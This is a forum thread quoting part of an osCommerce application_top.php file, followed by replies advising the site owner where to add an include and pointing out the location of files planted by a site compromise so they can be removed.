 

break;

 

}

 

}

 

 

 

// include the who's online functions

 

require(DIR_WS_FUNCTIONS . 'whos_online.php');

 

tep_update_whos_online();

 

 

 

// include the password crypto functions

 

require(DIR_WS_FUNCTIONS . 'password_funcs.php');

 

 

 

// include validation functions (right now only email address)

 

require(DIR_WS_FUNCTIONS . 'validations.php');

 

 

 

// split-page-results

 

require(DIR_WS_CLASSES . 'split_page_results.php');

 

 

 

// infobox

 

require(DIR_WS_CLASSES . 'boxes.php');

 

 

 

// auto activate and expire banners

 

require(DIR_WS_FUNCTIONS . 'banner.php');

 

tep_activate_banners();

 

tep_expire_banners();

 

 

 

// auto expire special products

 

require(DIR_WS_FUNCTIONS . 'specials.php');

 

tep_expire_specials();

 

// auto expire featured products

 

require(DIR_WS_FUNCTIONS . 'featured.php');

 

tep_expire_featured();

 

 

 

// Bestseller Box

 

// auto expire bestseller products

 

require(DIR_WS_FUNCTIONS . 'bestseller2.php');

 

tep_expire_bestseller();

 

// Bestseller Box

 

 

 

// calculate category path

 

if (isset($HTTP_GET_VARS['cPath'])) {

 

$cPath = $HTTP_GET_VARS['cPath'];

 

} elseif (isset($HTTP_GET_VARS['products_id']) && !isset($HTTP_GET_VARS['manufacturers_id'])) {

 

$cPath = tep_get_product_path($HTTP_GET_VARS['products_id']);

 

} else {

 

$cPath = '';

 

}

 

 

 

if (tep_not_null($cPath)) {

 

$cPath_array = tep_parse_category_path($cPath);

 

$cPath = implode('_', $cPath_array);

 

$current_category_id = $cPath_array[(sizeof($cPath_array)-1)];

 

} else {

 

$current_category_id = 0;

 

}

 

 

 

// include the breadcrumb class and start the breadcrumb trail

 

require(DIR_WS_CLASSES . 'breadcrumb.php');

 

$breadcrumb = new breadcrumb;

 

 

 

$breadcrumb->add(HEADER_TITLE_TOP, HTTP_SERVER);

 

$breadcrumb->add(HEADER_TITLE_CATALOG, tep_href_link(FILENAME_DEFAULT));

 

 

 

// add category names or the manufacturer name to the breadcrumb trail

 

if (isset($cPath_array)) {

 

for ($i=0, $n=sizeof($cPath_array); $i<$n; $i++) {

 

$categories_query = tep_db_query("select categories_name from " . TABLE_CATEGORIES_DESCRIPTION . " where categories_id = '" . (int)$cPath_array[$i] . "' and language_id = '" . (int)$languages_id . "'");

 

if (tep_db_num_rows($categories_query) > 0) {

 

$categories = tep_db_fetch_array($categories_query);

 

$breadcrumb->add($categories['categories_name'], tep_href_link(FILENAME_DEFAULT, 'cPath=' . implode('_', array_slice($cPath_array, 0, ($i+1)))));

 

} else {

 

break;

 

}

 

}

 

} elseif (isset($HTTP_GET_VARS['manufacturers_id'])) {

 

$manufacturers_query = tep_db_query("select manufacturers_name from " . TABLE_MANUFACTURERS . " where manufacturers_id = '" . (int)$HTTP_GET_VARS['manufacturers_id'] . "'");

 

if (tep_db_num_rows($manufacturers_query)) {

 

$manufacturers = tep_db_fetch_array($manufacturers_query);

 

$breadcrumb->add($manufacturers['manufacturers_name'], tep_href_link(FILENAME_DEFAULT, 'manufacturers_id=' . $HTTP_GET_VARS['manufacturers_id']));

 

}

 

}

 

 

 

// add the products model to the breadcrumb trail

 

if (isset($HTTP_GET_VARS['products_id'])) {

 

$model_query = tep_db_query("select products_model from " . TABLE_PRODUCTS . " where products_id = '" . (int)$HTTP_GET_VARS['products_id'] . "'");

 

if (tep_db_num_rows($model_query)) {

 

$model = tep_db_fetch_array($model_query);

 

$breadcrumb->add($model['products_model'], tep_href_link(FILENAME_PRODUCT_INFO, 'cPath=' . $cPath . '&products_id=' . $HTTP_GET_VARS['products_id']));

 

}

 

}

 

 

 

// initialize the message stack for output messages

 

require(DIR_WS_CLASSES . 'message_stack.php');

 

$messageStack = new messageStack;

 

 

 

// set which precautions should be checked

 

define('WARN_INSTALL_EXISTENCE', 'true');

 

define('WARN_CONFIG_WRITEABLE', 'true');

 

define('WARN_SESSION_DIRECTORY_NOT_WRITEABLE', 'true');

 

define('WARN_SESSION_AUTO_START', 'true');

 

define('WARN_DOWNLOAD_DIRECTORY_NOT_READABLE', 'true');

 

 

 

// {{ buySAFE Module

 

if ($cart->count_contents() > 0)

 

{

 

require(DIR_WS_CLASSES . 'buysafe.php');

 

$buysafe_module = new buysafe_class;

 

$WantsBond = ($HTTP_POST_VARS['WantsBond'] ? $HTTP_POST_VARS['WantsBond'] : $HTTP_SESSION_VARS['WantsBond']);

 

$buysafe_cart_id = MODULE_BUYSAFE_BUYSAFE_CART_PREFIX . '-' . tep_session_id() . tep_count_customer_orders();

 

$buysafe_params = array('WantsBond' => ($WantsBond ? $WantsBond : 'false'), 'buysafe_cart_id' => $buysafe_cart_id);

 

$buysafe_result = $buysafe_module->call_api('AddUpdateShoppingCart', $buysafe_params);

 

// print_r($buysafe_result);

 

if (is_array($buysafe_result))

 

{

 

global $buysafe_result;

 

tep_session_register('WantsBond');

 

if (tep_not_null($buysafe_result['faultstring']))

 

{

 

if (strstr($buysafe_result['faultstring'], 'timed out'))

 

{

 

tep_db_query("update " . TABLE_CONFIGURATION . " set configuration_value = (now() + interval 1 hour) where configuration_key = 'MODULE_BUYSAFE_BUYSAFE_STOP_API_CALLS_TIME'");

 

}

 

// $messageStack->add('header', 'buySAFE fault: ' . $buysafe_result['faultstring'], 'error');

 

}

 

}

 

}

 

// }}

 

require_once(DIR_WS_CLASSES . 'preventDuplicates.php');

 

$preventDuplicates = new preventDuplicates();

 

?>

[♥FIMBLE]

Hi Add it after this line

 

require(DIR_WS_INCLUDES . 'filenames.php');

 

You also need to get rid of the hack code at the top of your file

Nic

[♥FIMBLE]

decoded the encrypted code to find where the additional files have been added, its location is here

/home/rjrdisco/public_html/backup/phpforms/cnk-admin/idx/display/sections/advanced/style.css.php

Nic